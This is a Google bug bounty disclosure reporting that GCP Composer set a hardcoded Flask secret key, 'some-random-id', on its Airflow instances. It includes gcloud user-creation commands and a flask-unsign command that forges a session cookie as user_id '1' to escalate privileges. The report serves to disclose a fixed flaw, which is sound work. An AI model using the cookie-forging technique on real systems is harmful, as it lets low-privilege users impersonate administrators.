Skip to Content (Press Enter)
Google
Bug Hunters
Privilege escalation in Airflow created by GCP Composer due to hardcoded secret_key
Google VRP
triaged
00:55 | Mar 29, 2022
accepted
21:54 | Apr 12, 2022
fixed
18:06 | Sep 7, 2022
Summary:
Privilege escalation in Airflow created by GCP Composer due to hardcoded secret_key
Product:
Google Cloud
Vulnerability type:
Privilege Escalation
Details
When a new
Composer environment
is generated in Composer, the
same secret_key is always used: "some-random-id"
.
The name already indicates that the key
should be something random
, but it's actually the string "some-random-id". I also couldn't find any documentation about this secret key used by Composer, nor any place where it's indicated that it should be changed or how to change it.
This key is actually the
secret used by flaks to sign the auth cookies
.
This means that
anyone with access to the Apache Airflow
instance generated by Composer will be able to impersonate any other user. So for example, someone with
Viewer
access (this role doesn't doesn't even grant view access over the configuration) is going to be able to *
sign a valid cookie with a different user_id *
with more privileges to escalate privileges.
Note that the
CVE-2020-17526 is similar
to this vulnerability, the only difference is that GCP instead of using the default Airflow password has
hardcoded its own one
.
The only thing preventing this from being a
complete Take Over of all the Apache Airflow environments
created by Composer is the fact that GCP first checks if the GCP user has access to the environment. Please, let me know if I'm wrong in the previous sentence, as if it's possible for a GCP unauthenticated user to access the Apache Airflow web consoles, he will be potentially able to compromise them knowing this secret.
Attack scenario
For example, let's suppose there is a user with View access to an Apache Airflow instance created by Composer. This privilege might have been given to the user with:
gcloud composer environments run <airflow-env> \
--location us-central1 users create -- \
-u accounts.google.com:<user-account> \
-e somestring \
-f somestring \
-l - -r Viewer --use-random-password
Now, when that user log-in his
visibility is going to be be very limited
(he cannot even see the config).
However, the
user knows that the flask secret key is "some-random-id".
So, he can craft a new cookie with the user_id "1" (as it's potentially the most privileged one):
flask-unsign --sign --secret 'some-random-id' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}"
Using the cookie generated by the previous code the viewer user will impersonate the user with id "1" effectively escalating privileges.
The previous example was explained with a user with role Viewer, but this issue can be
exploited with any other role, including Public role
(which is a role that doesn't grant any type of permission over the Airflow console).
gcloud composer environments run <airflow-env> \
--location us-central1 users create -- \
-u accounts.google.com:<user-account> \
-e somestring \
-f somestring \
-l - -r Public --use-random-password
登录
使用 Google 账号登录